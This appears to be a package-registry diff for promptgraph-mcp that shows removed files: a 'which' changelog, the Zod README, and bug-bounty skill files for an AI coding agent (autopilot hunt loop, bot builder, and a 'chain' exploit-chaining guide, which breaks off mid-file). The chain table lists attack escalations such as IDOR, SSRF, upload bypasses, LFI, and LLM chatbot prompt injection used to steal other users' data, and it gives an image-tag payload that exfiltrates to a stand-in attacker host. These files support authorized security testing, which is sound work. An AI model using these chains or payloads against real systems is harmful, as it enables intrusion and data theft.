promptgraph-mcp 2.4.7 → 2.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +3 -6
- package/ann.js +23 -51
- package/api.js +200 -0
- package/config.js +14 -0
- package/db.js +48 -0
- package/embedder.js +10 -0
- package/github-import.js +167 -27
- package/indexer.js +49 -12
- package/marketplace.js +130 -7
- package/package.json +9 -3
- package/search.js +86 -20
- package/src/filter/hard-filter.js +2 -0
- package/src/filter/train.js +3 -1
- package/src/reranker/reranker.js +27 -0
- package/src/store/flat-store.js +61 -0
- package/src/store/hnsw-store.js +187 -0
- package/src/store/index.js +19 -0
- package/src/store/vector-store.js +9 -0
- package/src/utils/rate-limiter.js +33 -0
- package/validator.js +31 -1
- package/registry/training/bad/accepts-HISTORY.md +0 -250
- package/registry/training/bad/argparse-CHANGELOG.md +0 -185
- package/registry/training/bad/balanced-match-LICENSE.md +0 -23
- package/registry/training/bad/better-sqlite3-README.md +0 -99
- package/registry/training/bad/bindings-LICENSE.md +0 -22
- package/registry/training/bad/bl-LICENSE.md +0 -13
- package/registry/training/bad/body-parser-README.md +0 -494
- package/registry/training/bad/bytes-HISTORY.md +0 -97
- package/registry/training/bad/camelcase-README.md +0 -135
- package/registry/training/bad/chai-README.md +0 -162
- package/registry/training/bad/cli-progress-LICENSE.md +0 -24
- package/registry/training/bad/content-type-HISTORY.md +0 -29
- package/registry/training/bad/cookie-SECURITY.md +0 -25
- package/registry/training/bad/cookie-signature-HISTORY.md +0 -70
- package/registry/training/bad/cors-README.md +0 -277
- package/registry/training/bad/cross-spawn-README.md +0 -89
- package/registry/training/bad/deep-extend-CHANGELOG.md +0 -46
- package/registry/training/bad/depd-HISTORY.md +0 -103
- package/registry/training/bad/esprima-README.md +0 -46
- package/registry/training/bad/etag-HISTORY.md +0 -83
- package/registry/training/bad/expect-type-SECURITY.md +0 -14
- package/registry/training/bad/finalhandler-HISTORY.md +0 -239
- package/registry/training/bad/fresh-HISTORY.md +0 -80
- package/registry/training/bad/glob-LICENSE.md +0 -63
- package/registry/training/bad/hono-README.md +0 -85
- package/registry/training/bad/http-errors-HISTORY.md +0 -186
- package/registry/training/bad/jose-LICENSE.md +0 -21
- package/registry/training/bad/jose-README.md +0 -153
- package/registry/training/bad/js-yaml-README.md +0 -299
- package/registry/training/bad/json-schema-typed-LICENSE.md +0 -57
- package/registry/training/bad/json-stringify-safe-CHANGELOG.md +0 -14
- package/registry/training/bad/lru-cache-LICENSE.md +0 -55
- package/registry/training/bad/media-typer-HISTORY.md +0 -50
- package/registry/training/bad/minimatch-LICENSE.md +0 -55
- package/registry/training/bad/minimist-CHANGELOG.md +0 -298
- package/registry/training/bad/minimist-README.md +0 -121
- package/registry/training/bad/ms-LICENSE.md +0 -21
- package/registry/training/bad/negotiator-HISTORY.md +0 -114
- package/registry/training/bad/on-finished-HISTORY.md +0 -98
- package/registry/training/bad/pkce-challenge-CHANGELOG.md +0 -114
- package/registry/training/bad/postcss-README.md +0 -28
- package/registry/training/bad/prebuild-install-CHANGELOG.md +0 -131
- package/registry/training/bad/proxy-addr-HISTORY.md +0 -161
- package/registry/training/bad/qs-CHANGELOG.md +0 -822
- package/registry/training/bad/rc-README.md +0 -227
- package/registry/training/bad/readable-stream-CONTRIBUTING.md +0 -38
- package/registry/training/bad/router-HISTORY.md +0 -228
- package/registry/training/bad/semver-README.md +0 -680
- package/registry/training/bad/send-README.md +0 -317
- package/registry/training/bad/serve-static-README.md +0 -253
- package/registry/training/bad/statuses-HISTORY.md +0 -87
- package/registry/training/bad/type-is-HISTORY.md +0 -292
- package/registry/training/bad/vary-HISTORY.md +0 -39
- package/registry/training/bad/vite-LICENSE.md +0 -2230
- package/registry/training/bad/which-CHANGELOG.md +0 -166
- package/registry/training/bad/zod-README.md +0 -191
- package/registry/training/good/skills-store-autopilot.md +0 -85
- package/registry/training/good/skills-store-bot-builder.md +0 -70
- package/registry/training/good/skills-store-chain.md +0 -136
- package/registry/training/good/skills-store-evolve.md +0 -100
- package/registry/training/good/skills-store-game.md +0 -27
- package/registry/training/good/skills-store-hunt.md +0 -102
- package/registry/training/good/skills-store-intel.md +0 -56
- package/registry/training/good/skills-store-memory-gc.md +0 -58
- package/registry/training/good/skills-store-pcsort.md +0 -207
- package/registry/training/good/skills-store-pickup.md +0 -60
- package/registry/training/good/skills-store-recon.md +0 -141
- package/registry/training/good/skills-store-remember.md +0 -64
- package/registry/training/good/skills-store-report.md +0 -117
- package/registry/training/good/skills-store-router.md +0 -225
- package/registry/training/good/skills-store-search.md +0 -168
- package/registry/training/good/skills-store-surface.md +0 -53
- package/registry/training/good/skills-store-token-scan.md +0 -141
- package/registry/training/good/skills-store-triage.md +0 -97
- package/registry/training/good/skills-store-unity.md +0 -733
- package/registry/training/good/skills-store-validate.md +0 -135
- package/registry/training/good/skills-store-web3-audit.md +0 -217
- package/src/filter/cluster.js +0 -52
- package/src/filter/dedup.js +0 -36
|
@@ -1,166 +0,0 @@
|
|
|
1
|
-
# Changes
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
## 2.0.2
|
|
5
|
-
|
|
6
|
-
* Rename bin to `node-which`
|
|
7
|
-
|
|
8
|
-
## 2.0.1
|
|
9
|
-
|
|
10
|
-
* generate changelog and publish on version bump
|
|
11
|
-
* enforce 100% test coverage
|
|
12
|
-
* Promise interface
|
|
13
|
-
|
|
14
|
-
## 2.0.0
|
|
15
|
-
|
|
16
|
-
* Parallel tests, modern JavaScript, and drop support for node < 8
|
|
17
|
-
|
|
18
|
-
## 1.3.1
|
|
19
|
-
|
|
20
|
-
* update deps
|
|
21
|
-
* update travis
|
|
22
|
-
|
|
23
|
-
## v1.3.0
|
|
24
|
-
|
|
25
|
-
* Add nothrow option to which.sync
|
|
26
|
-
* update tap
|
|
27
|
-
|
|
28
|
-
## v1.2.14
|
|
29
|
-
|
|
30
|
-
* appveyor: drop node 5 and 0.x
|
|
31
|
-
* travis-ci: add node 6, drop 0.x
|
|
32
|
-
|
|
33
|
-
## v1.2.13
|
|
34
|
-
|
|
35
|
-
* test: Pass missing option to pass on windows
|
|
36
|
-
* update tap
|
|
37
|
-
* update isexe to 2.0.0
|
|
38
|
-
* neveragain.tech pledge request
|
|
39
|
-
|
|
40
|
-
## v1.2.12
|
|
41
|
-
|
|
42
|
-
* Removed unused require
|
|
43
|
-
|
|
44
|
-
## v1.2.11
|
|
45
|
-
|
|
46
|
-
* Prevent changelog script from being included in package
|
|
47
|
-
|
|
48
|
-
## v1.2.10
|
|
49
|
-
|
|
50
|
-
* Use env.PATH only, not env.Path
|
|
51
|
-
|
|
52
|
-
## v1.2.9
|
|
53
|
-
|
|
54
|
-
* fix for paths starting with ../
|
|
55
|
-
* Remove unused `is-absolute` module
|
|
56
|
-
|
|
57
|
-
## v1.2.8
|
|
58
|
-
|
|
59
|
-
* bullet items in changelog that contain (but don't start with) #
|
|
60
|
-
|
|
61
|
-
## v1.2.7
|
|
62
|
-
|
|
63
|
-
* strip 'update changelog' changelog entries out of changelog
|
|
64
|
-
|
|
65
|
-
## v1.2.6
|
|
66
|
-
|
|
67
|
-
* make the changelog bulleted
|
|
68
|
-
|
|
69
|
-
## v1.2.5
|
|
70
|
-
|
|
71
|
-
* make a changelog, and keep it up to date
|
|
72
|
-
* don't include tests in package
|
|
73
|
-
* Properly handle relative-path executables
|
|
74
|
-
* appveyor
|
|
75
|
-
* Attach error code to Not Found error
|
|
76
|
-
* Make tests pass on Windows
|
|
77
|
-
|
|
78
|
-
## v1.2.4
|
|
79
|
-
|
|
80
|
-
* Fix typo
|
|
81
|
-
|
|
82
|
-
## v1.2.3
|
|
83
|
-
|
|
84
|
-
* update isexe, fix regression in pathExt handling
|
|
85
|
-
|
|
86
|
-
## v1.2.2
|
|
87
|
-
|
|
88
|
-
* update deps, use isexe module, test windows
|
|
89
|
-
|
|
90
|
-
## v1.2.1
|
|
91
|
-
|
|
92
|
-
* Sometimes windows PATH entries are quoted
|
|
93
|
-
* Fixed a bug in the check for group and user mode bits. This bug was introduced during refactoring for supporting strict mode.
|
|
94
|
-
* doc cli
|
|
95
|
-
|
|
96
|
-
## v1.2.0
|
|
97
|
-
|
|
98
|
-
* Add support for opt.all and -as cli flags
|
|
99
|
-
* test the bin
|
|
100
|
-
* update travis
|
|
101
|
-
* Allow checking for multiple programs in bin/which
|
|
102
|
-
* tap 2
|
|
103
|
-
|
|
104
|
-
## v1.1.2
|
|
105
|
-
|
|
106
|
-
* travis
|
|
107
|
-
* Refactored and fixed undefined error on Windows
|
|
108
|
-
* Support strict mode
|
|
109
|
-
|
|
110
|
-
## v1.1.1
|
|
111
|
-
|
|
112
|
-
* test +g exes against secondary groups, if available
|
|
113
|
-
* Use windows exe semantics on cygwin & msys
|
|
114
|
-
* cwd should be first in path on win32, not last
|
|
115
|
-
* Handle lower-case 'env.Path' on Windows
|
|
116
|
-
* Update docs
|
|
117
|
-
* use single-quotes
|
|
118
|
-
|
|
119
|
-
## v1.1.0
|
|
120
|
-
|
|
121
|
-
* Add tests, depend on is-absolute
|
|
122
|
-
|
|
123
|
-
## v1.0.9
|
|
124
|
-
|
|
125
|
-
* which.js: root is allowed to execute files owned by anyone
|
|
126
|
-
|
|
127
|
-
## v1.0.8
|
|
128
|
-
|
|
129
|
-
* don't use graceful-fs
|
|
130
|
-
|
|
131
|
-
## v1.0.7
|
|
132
|
-
|
|
133
|
-
* add license to package.json
|
|
134
|
-
|
|
135
|
-
## v1.0.6
|
|
136
|
-
|
|
137
|
-
* isc license
|
|
138
|
-
|
|
139
|
-
## 1.0.5
|
|
140
|
-
|
|
141
|
-
* Awful typo
|
|
142
|
-
|
|
143
|
-
## 1.0.4
|
|
144
|
-
|
|
145
|
-
* Test for path absoluteness properly
|
|
146
|
-
* win: Allow '' as a pathext if cmd has a . in it
|
|
147
|
-
|
|
148
|
-
## 1.0.3
|
|
149
|
-
|
|
150
|
-
* Remove references to execPath
|
|
151
|
-
* Make `which.sync()` work on Windows by honoring the PATHEXT variable.
|
|
152
|
-
* Make `isExe()` always return true on Windows.
|
|
153
|
-
* MIT
|
|
154
|
-
|
|
155
|
-
## 1.0.2
|
|
156
|
-
|
|
157
|
-
* Only files can be exes
|
|
158
|
-
|
|
159
|
-
## 1.0.1
|
|
160
|
-
|
|
161
|
-
* Respect the PATHEXT env for win32 support
|
|
162
|
-
* should 0755 the bin
|
|
163
|
-
* binary
|
|
164
|
-
* guts
|
|
165
|
-
* package
|
|
166
|
-
* 1st
|
|
@@ -1,191 +0,0 @@
|
|
|
1
|
-
<p align="center">
|
|
2
|
-
<img src="logo.svg" width="200px" align="center" alt="Zod logo" />
|
|
3
|
-
<h1 align="center">Zod</h1>
|
|
4
|
-
<p align="center">
|
|
5
|
-
TypeScript-first schema validation with static type inference
|
|
6
|
-
<br/>
|
|
7
|
-
by <a href="https://x.com/colinhacks">@colinhacks</a>
|
|
8
|
-
</p>
|
|
9
|
-
</p>
|
|
10
|
-
<br/>
|
|
11
|
-
|
|
12
|
-
<p align="center">
|
|
13
|
-
<a href="https://github.com/colinhacks/zod/actions?query=branch%3Amain"><img src="https://github.com/colinhacks/zod/actions/workflows/test.yml/badge.svg?event=push&branch=main" alt="Zod CI status" /></a>
|
|
14
|
-
<a href="https://opensource.org/licenses/MIT" rel="nofollow"><img src="https://img.shields.io/github/license/colinhacks/zod" alt="License"></a>
|
|
15
|
-
<a href="https://www.npmjs.com/package/zod" rel="nofollow"><img src="https://img.shields.io/npm/dw/zod.svg" alt="npm"></a>
|
|
16
|
-
<a href="https://discord.gg/KaSRdyX2vc" rel="nofollow"><img src="https://img.shields.io/discord/893487829802418277?label=Discord&logo=discord&logoColor=white" alt="discord server"></a>
|
|
17
|
-
<a href="https://github.com/colinhacks/zod" rel="nofollow"><img src="https://img.shields.io/github/stars/colinhacks/zod" alt="stars"></a>
|
|
18
|
-
</p>
|
|
19
|
-
|
|
20
|
-
<div align="center">
|
|
21
|
-
<a href="https://zod.dev/api">Docs</a>
|
|
22
|
-
<span> • </span>
|
|
23
|
-
<a href="https://discord.gg/RcG33DQJdf">Discord</a>
|
|
24
|
-
<span> • </span>
|
|
25
|
-
<a href="https://twitter.com/colinhacks">𝕏</a>
|
|
26
|
-
<span> • </span>
|
|
27
|
-
<a href="https://bsky.app/profile/zod.dev">Bluesky</a>
|
|
28
|
-
<br />
|
|
29
|
-
</div>
|
|
30
|
-
|
|
31
|
-
<br/>
|
|
32
|
-
<br/>
|
|
33
|
-
|
|
34
|
-
### [Read the docs →](https://zod.dev/api)
|
|
35
|
-
|
|
36
|
-
<br/>
|
|
37
|
-
<br/>
|
|
38
|
-
|
|
39
|
-
## What is Zod?
|
|
40
|
-
|
|
41
|
-
Zod is a TypeScript-first validation library. Define a schema and parse some data with it. You'll get back a strongly typed, validated result.
|
|
42
|
-
|
|
43
|
-
```ts
|
|
44
|
-
import * as z from "zod";
|
|
45
|
-
|
|
46
|
-
const User = z.object({
|
|
47
|
-
name: z.string(),
|
|
48
|
-
});
|
|
49
|
-
|
|
50
|
-
// some untrusted data...
|
|
51
|
-
const input = {
|
|
52
|
-
/* stuff */
|
|
53
|
-
};
|
|
54
|
-
|
|
55
|
-
// the parsed result is validated and type safe!
|
|
56
|
-
const data = User.parse(input);
|
|
57
|
-
|
|
58
|
-
// so you can use it with confidence :)
|
|
59
|
-
console.log(data.name);
|
|
60
|
-
```
|
|
61
|
-
|
|
62
|
-
<br/>
|
|
63
|
-
|
|
64
|
-
## Features
|
|
65
|
-
|
|
66
|
-
- Zero external dependencies
|
|
67
|
-
- Works in Node.js and all modern browsers
|
|
68
|
-
- Tiny: `2kb` core bundle (gzipped)
|
|
69
|
-
- Immutable API: methods return a new instance
|
|
70
|
-
- Concise interface
|
|
71
|
-
- Works with TypeScript and plain JS
|
|
72
|
-
- Built-in JSON Schema conversion
|
|
73
|
-
- Extensive ecosystem
|
|
74
|
-
|
|
75
|
-
<br/>
|
|
76
|
-
|
|
77
|
-
## Installation
|
|
78
|
-
|
|
79
|
-
```sh
|
|
80
|
-
npm install zod
|
|
81
|
-
```
|
|
82
|
-
|
|
83
|
-
<br/>
|
|
84
|
-
|
|
85
|
-
## Basic usage
|
|
86
|
-
|
|
87
|
-
Before you can do anything else, you need to define a schema. For the purposes of this guide, we'll use a simple object schema.
|
|
88
|
-
|
|
89
|
-
```ts
|
|
90
|
-
import * as z from "zod";
|
|
91
|
-
|
|
92
|
-
const Player = z.object({
|
|
93
|
-
username: z.string(),
|
|
94
|
-
xp: z.number(),
|
|
95
|
-
});
|
|
96
|
-
```
|
|
97
|
-
|
|
98
|
-
### Parsing data
|
|
99
|
-
|
|
100
|
-
Given any Zod schema, use `.parse` to validate an input. If it's valid, Zod returns a strongly-typed _deep clone_ of the input.
|
|
101
|
-
|
|
102
|
-
```ts
|
|
103
|
-
Player.parse({ username: "billie", xp: 100 });
|
|
104
|
-
// => returns { username: "billie", xp: 100 }
|
|
105
|
-
```
|
|
106
|
-
|
|
107
|
-
**Note** — If your schema uses certain asynchronous APIs like `async` [refinements](https://zod.dev/api#refinements) or [transforms](https://zod.dev/api#transforms), you'll need to use the `.parseAsync()` method instead.
|
|
108
|
-
|
|
109
|
-
```ts
|
|
110
|
-
const schema = z.string().refine(async (val) => val.length <= 8);
|
|
111
|
-
|
|
112
|
-
await schema.parseAsync("hello");
|
|
113
|
-
// => "hello"
|
|
114
|
-
```
|
|
115
|
-
|
|
116
|
-
### Handling errors
|
|
117
|
-
|
|
118
|
-
When validation fails, the `.parse()` method will throw a `ZodError` instance with granular information about the validation issues.
|
|
119
|
-
|
|
120
|
-
```ts
|
|
121
|
-
try {
|
|
122
|
-
Player.parse({ username: 42, xp: "100" });
|
|
123
|
-
} catch (err) {
|
|
124
|
-
if (err instanceof z.ZodError) {
|
|
125
|
-
err.issues;
|
|
126
|
-
/* [
|
|
127
|
-
{
|
|
128
|
-
expected: 'string',
|
|
129
|
-
code: 'invalid_type',
|
|
130
|
-
path: [ 'username' ],
|
|
131
|
-
message: 'Invalid input: expected string'
|
|
132
|
-
},
|
|
133
|
-
{
|
|
134
|
-
expected: 'number',
|
|
135
|
-
code: 'invalid_type',
|
|
136
|
-
path: [ 'xp' ],
|
|
137
|
-
message: 'Invalid input: expected number'
|
|
138
|
-
}
|
|
139
|
-
] */
|
|
140
|
-
}
|
|
141
|
-
}
|
|
142
|
-
```
|
|
143
|
-
|
|
144
|
-
To avoid a `try/catch` block, you can use the `.safeParse()` method to get back a plain result object containing either the successfully parsed data or a `ZodError`. The result type is a [discriminated union](https://www.typescriptlang.org/docs/handbook/2/narrowing.html#discriminated-unions), so you can handle both cases conveniently.
|
|
145
|
-
|
|
146
|
-
```ts
|
|
147
|
-
const result = Player.safeParse({ username: 42, xp: "100" });
|
|
148
|
-
if (!result.success) {
|
|
149
|
-
result.error; // ZodError instance
|
|
150
|
-
} else {
|
|
151
|
-
result.data; // { username: string; xp: number }
|
|
152
|
-
}
|
|
153
|
-
```
|
|
154
|
-
|
|
155
|
-
**Note** — If your schema uses certain asynchronous APIs like `async` [refinements](https://zod.dev/api#refinements) or [transforms](https://zod.dev/api#transforms), you'll need to use the `.safeParseAsync()` method instead.
|
|
156
|
-
|
|
157
|
-
```ts
|
|
158
|
-
const schema = z.string().refine(async (val) => val.length <= 8);
|
|
159
|
-
|
|
160
|
-
await schema.safeParseAsync("hello");
|
|
161
|
-
// => { success: true; data: "hello" }
|
|
162
|
-
```
|
|
163
|
-
|
|
164
|
-
### Inferring types
|
|
165
|
-
|
|
166
|
-
Zod infers a static type from your schema definitions. You can extract this type with the `z.infer<>` utility and use it however you like.
|
|
167
|
-
|
|
168
|
-
```ts
|
|
169
|
-
const Player = z.object({
|
|
170
|
-
username: z.string(),
|
|
171
|
-
xp: z.number(),
|
|
172
|
-
});
|
|
173
|
-
|
|
174
|
-
// extract the inferred type
|
|
175
|
-
type Player = z.infer<typeof Player>;
|
|
176
|
-
|
|
177
|
-
// use it in your code
|
|
178
|
-
const player: Player = { username: "billie", xp: 100 };
|
|
179
|
-
```
|
|
180
|
-
|
|
181
|
-
In some cases, the input & output types of a schema can diverge. For instance, the `.transform()` API can convert the input from one type to another. In these cases, you can extract the input and output types independently:
|
|
182
|
-
|
|
183
|
-
```ts
|
|
184
|
-
const mySchema = z.string().transform((val) => val.length);
|
|
185
|
-
|
|
186
|
-
type MySchemaIn = z.input<typeof mySchema>;
|
|
187
|
-
// => string
|
|
188
|
-
|
|
189
|
-
type MySchemaOut = z.output<typeof mySchema>; // equivalent to z.infer<typeof mySchema>
|
|
190
|
-
// number
|
|
191
|
-
```
|
|
@@ -1,85 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: autopilot
|
|
3
|
-
description: Run autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
# /autopilot
|
|
7
|
-
|
|
8
|
-
Autonomous hunt loop with deterministic scope safety and configurable checkpoints.
|
|
9
|
-
|
|
10
|
-
## Usage
|
|
11
|
-
|
|
12
|
-
```
|
|
13
|
-
/autopilot target.com # default: --paranoid mode
|
|
14
|
-
/autopilot target.com --normal # batch checkpoint after validation
|
|
15
|
-
/autopilot target.com --yolo # minimal checkpoints (still requires report approval)
|
|
16
|
-
/autopilot target.com --quick # fast surface scan, fewer checks, lower token use
|
|
17
|
-
/autopilot targets.txt # multiple targets — one domain per line in the file
|
|
18
|
-
```
|
|
19
|
-
|
|
20
|
-
## Session Isolation (Important)
|
|
21
|
-
|
|
22
|
-
**Start a fresh Claude Code session per target.** Claude accumulates context across a session —
|
|
23
|
-
testing multiple targets in one session causes cross-contamination where findings, payloads,
|
|
24
|
-
and tech stack assumptions from target A bleed into target B.
|
|
25
|
-
|
|
26
|
-
Best practice:
|
|
27
|
-
```bash
|
|
28
|
-
# Terminal 1: target A
|
|
29
|
-
claude → /autopilot targetA.com
|
|
30
|
-
|
|
31
|
-
# Terminal 2: target B (separate process)
|
|
32
|
-
claude → /autopilot targetB.com
|
|
33
|
-
```
|
|
34
|
-
|
|
35
|
-
If you must test multiple targets in one session, run `/pickup target.com` at the start of
|
|
36
|
-
each target switch to reload the correct context.
|
|
37
|
-
|
|
38
|
-
## Token Optimization
|
|
39
|
-
|
|
40
|
-
Use `--quick` for faster, lower-cost scans (skips deep fuzzing and extended nuclei templates):
|
|
41
|
-
```
|
|
42
|
-
/autopilot target.com --quick # ~40% fewer tokens, covers main attack surface
|
|
43
|
-
/hunt target.com --vuln-class idor # single bug class — lowest token use
|
|
44
|
-
```
|
|
45
|
-
|
|
46
|
-
For long hunts, run `/compact` (Claude Code built-in) periodically to compress context
|
|
47
|
-
without losing findings.
|
|
48
|
-
|
|
49
|
-
## What This Does
|
|
50
|
-
|
|
51
|
-
Runs the full hunt cycle without stopping for approval at each step:
|
|
52
|
-
|
|
53
|
-
```
|
|
54
|
-
1. SCOPE Load and confirm program scope
|
|
55
|
-
2. RECON Run recon (or use cached if < 7 days old)
|
|
56
|
-
3. RANK Prioritize attack surface (recon-ranker agent)
|
|
57
|
-
4. HUNT Test P1 endpoints systematically
|
|
58
|
-
5. VALIDATE 7-Question Gate on findings
|
|
59
|
-
6. REPORT Draft reports for validated findings
|
|
60
|
-
7. CHECKPOINT Present to human for review
|
|
61
|
-
```
|
|
62
|
-
|
|
63
|
-
## Safety Guarantees
|
|
64
|
-
|
|
65
|
-
- **Every URL** is checked against the scope allowlist before any request
|
|
66
|
-
- **Every request** is logged to `hunt-memory/audit.jsonl`
|
|
67
|
-
- **Reports are NEVER auto-submitted** — always requires explicit approval
|
|
68
|
-
- **PUT/DELETE/PATCH** require human approval in --yolo mode (safe methods only)
|
|
69
|
-
- **Circuit breaker** stops hammering if 5 consecutive 403/429/timeout on same host
|
|
70
|
-
- **Rate limited** at 1 req/sec (testing) and 10 req/sec (recon)
|
|
71
|
-
|
|
72
|
-
## Checkpoint Modes
|
|
73
|
-
|
|
74
|
-
| Mode | When it stops | Best for |
|
|
75
|
-
|---|---|---|
|
|
76
|
-
| `--paranoid` | Every finding + partial signal | New targets, learning the surface |
|
|
77
|
-
| `--normal` | After validation batch | Systematic coverage |
|
|
78
|
-
| `--yolo` | After full surface exhausted | Familiar targets, experienced hunters |
|
|
79
|
-
|
|
80
|
-
## After Autopilot
|
|
81
|
-
|
|
82
|
-
- Run `/remember` to log successful patterns to hunt memory
|
|
83
|
-
- Run `/pickup target.com` next time to pick up where you left off
|
|
84
|
-
- Check `hunt-memory/audit.jsonl` for a full request log
|
|
85
|
-
|
|
@@ -1,70 +0,0 @@
|
|
|
1
|
-
# Bot Builder — Full Pipeline
|
|
2
|
-
|
|
3
|
-
Build a production-ready bot (Telegram or Discord) through a full professional 11-stage pipeline: requirements analysis → competitive research → architecture design → viral mechanics + monetization → code generation → code review (2 rounds) → security audit → test generation → README → Docker deployment → launch strategy.
|
|
4
|
-
|
|
5
|
-
---
|
|
6
|
-
|
|
7
|
-
## Step 1 — Gather requirements
|
|
8
|
-
|
|
9
|
-
Ask the user (all 4 can be answered in one message):
|
|
10
|
-
1. **Platform:** Telegram or Discord?
|
|
11
|
-
2. **Goal:** What should the bot do? (be specific)
|
|
12
|
-
3. **Target audience:** Who will use it?
|
|
13
|
-
4. **Monetization:** free / freemium / paid?
|
|
14
|
-
|
|
15
|
-
Wait for answers before continuing.
|
|
16
|
-
|
|
17
|
-
---
|
|
18
|
-
|
|
19
|
-
## Step 2 — Run the full pipeline
|
|
20
|
-
|
|
21
|
-
Use the PowerShell tool to run (substitute real user values):
|
|
22
|
-
|
|
23
|
-
```powershell
|
|
24
|
-
cd "C:\Users\Sasha\.claude\dev-os"
|
|
25
|
-
$env:PYTHONIOENCODING = "utf-8"
|
|
26
|
-
python -m dev_os.cli build-bot `
|
|
27
|
-
--platform "PLATFORM_HERE" `
|
|
28
|
-
--goal "GOAL_HERE" `
|
|
29
|
-
--audience "AUDIENCE_HERE" `
|
|
30
|
-
--monetization "MONETIZATION_HERE"
|
|
31
|
-
```
|
|
32
|
-
|
|
33
|
-
Where PLATFORM_HERE is `telegram` or `discord`, the others are the user's answers verbatim.
|
|
34
|
-
|
|
35
|
-
Show the output to the user live as it runs (verbose=True prints each stage).
|
|
36
|
-
|
|
37
|
-
---
|
|
38
|
-
|
|
39
|
-
## Step 3 — Show saved files
|
|
40
|
-
|
|
41
|
-
After pipeline completes, read the report:
|
|
42
|
-
|
|
43
|
-
```powershell
|
|
44
|
-
$report = Get-ChildItem "$env:USERPROFILE\.claude\dev-os\bot_builds" | Sort-Object LastWriteTime -Descending | Select-Object -First 1
|
|
45
|
-
Write-Host "Build dir: $($report.FullName)"
|
|
46
|
-
Get-ChildItem $report.FullName | Format-Table Name, Length
|
|
47
|
-
```
|
|
48
|
-
|
|
49
|
-
---
|
|
50
|
-
|
|
51
|
-
## Step 4 — Present full summary
|
|
52
|
-
|
|
53
|
-
Show the user:
|
|
54
|
-
- **Stage timing table** — all 11 stages with status and duration
|
|
55
|
-
- **Files created** — bot.py, test_bot.py, README.md, docker-compose.yml, .env.example
|
|
56
|
-
- **Architecture decisions** — from pipeline_report.json stage 3 output
|
|
57
|
-
- **Security findings** — top issues from stage 7
|
|
58
|
-
- **Code quality score** — before → after review (stages 5→6)
|
|
59
|
-
- **Viral mechanic** — the specific mechanic chosen in stage 4
|
|
60
|
-
- **Launch strategy** — top 5 actions from stage 11
|
|
61
|
-
- **Run commands:**
|
|
62
|
-
```bash
|
|
63
|
-
cd ~/.claude/dev-os/bot_builds/BOT_NAME
|
|
64
|
-
cp .env.example .env
|
|
65
|
-
# Edit .env — add BOT_TOKEN
|
|
66
|
-
pip install -r requirements.txt
|
|
67
|
-
python bot.py
|
|
68
|
-
# Or: docker-compose up -d
|
|
69
|
-
```
|
|
70
|
-
|
|
@@ -1,136 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: chain
|
|
3
|
-
description: Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
|
|
4
|
-
---
|
|
5
|
-
|
|
6
|
-
# /chain
|
|
7
|
-
|
|
8
|
-
Build an A→B→C exploit chain for higher severity and payout.
|
|
9
|
-
|
|
10
|
-
## When to Use This
|
|
11
|
-
|
|
12
|
-
After confirming a standalone finding that:
|
|
13
|
-
- Is on the "conditionally valid" list (open redirect, SSRF DNS-only, etc.)
|
|
14
|
-
- Has been validated but classified as Low
|
|
15
|
-
- Could be Medium or High if combined with another finding
|
|
16
|
-
|
|
17
|
-
## Usage
|
|
18
|
-
|
|
19
|
-
```
|
|
20
|
-
/chain
|
|
21
|
-
```
|
|
22
|
-
|
|
23
|
-
Describe bug A when prompted. Include:
|
|
24
|
-
- Bug class
|
|
25
|
-
- Endpoint
|
|
26
|
-
- What you can do with it
|
|
27
|
-
- Target platform
|
|
28
|
-
|
|
29
|
-
## The A→B Signal Table
|
|
30
|
-
|
|
31
|
-
If you found A, immediately check these B candidates:
|
|
32
|
-
|
|
33
|
-
| Found A | Immediately Check B | Also Check C |
|
|
34
|
-
|---|---|---|
|
|
35
|
-
| IDOR on GET `/api/user/X/orders` | IDOR on PUT/DELETE same path | IDOR on ALL sibling endpoints |
|
|
36
|
-
| IDOR on `/v2/` endpoint | Same IDOR on `/v1/` (missing fix) | IDOR on mobile API |
|
|
37
|
-
| Auth bypass on one endpoint | Every sibling in same controller | Old API version |
|
|
38
|
-
| Stored XSS in user input | Does admin view this? (priv esc) | Email/export/PDF rendering |
|
|
39
|
-
| SSRF with DNS callback | SSRF reaching internal services | SSRF via open redirect |
|
|
40
|
-
| SQLi on one parameter | Every parameter in same endpoint | Same param type in sibling endpoints |
|
|
41
|
-
| File upload — PNG allowed | Try SVG (XSS), HTML, PHP/JSP (RCE) | Double extension: `shell.php.jpg` |
|
|
42
|
-
| OAuth missing PKCE | CSRF on OAuth flow (state param?) | Token reuse: auth_code exchanged twice? |
|
|
43
|
-
| Open redirect confirmed | OAuth code theft via redirect_uri | Phishing chain |
|
|
44
|
-
| GraphQL introspection | Auth bypass on mutations | IDOR via node(id) |
|
|
45
|
-
| Race condition on coupons | Race on credits/wallet | Race on rate limits |
|
|
46
|
-
| Exposed S3 listing | JS bundles → grep API keys/OAuth | .env files in bucket |
|
|
47
|
-
| Missing rate limit on OTP | Brute force OTP directly | Brute force password reset tokens |
|
|
48
|
-
| CSRF on sensitive action | XSS→CSRF = Critical | img src / form autosubmit |
|
|
49
|
-
| Path traversal | LFI: /proc/self/environ or logs | Log poisoning → RCE |
|
|
50
|
-
| Leaked API key in JS | Call API as that key — what can it do? | Other keys in same JS file |
|
|
51
|
-
| LLM chatbot prompt injection | IDOR via chatbot (read other user's data) | Exfil chain: `<img src="attacker?d=USER_DATA">` |
|
|
52
|
-
|
|
53
|
-
## Common High-Value Chains
|
|
54
|
-
|
|
55
|
-
### Chain 1: S3 → Bundle → Secret → OAuth (Coinbase Pattern)
|
|
56
|
-
```
|
|
57
|
-
1. S3 bucket public listing (Low)
|
|
58
|
-
2. Enumerate JS bundles from listing
|
|
59
|
-
3. grep bundles for OAuth client credentials
|
|
60
|
-
4. OAuth client secret = auth code exchange without PKCE
|
|
61
|
-
→ Result: 3 separate reports (S3: Low, OAuth secret: Med, PKCE: Med)
|
|
62
|
-
```
|
|
63
|
-
|
|
64
|
-
### Chain 2: Open Redirect → OAuth Code Theft → ATO
|
|
65
|
-
```
|
|
66
|
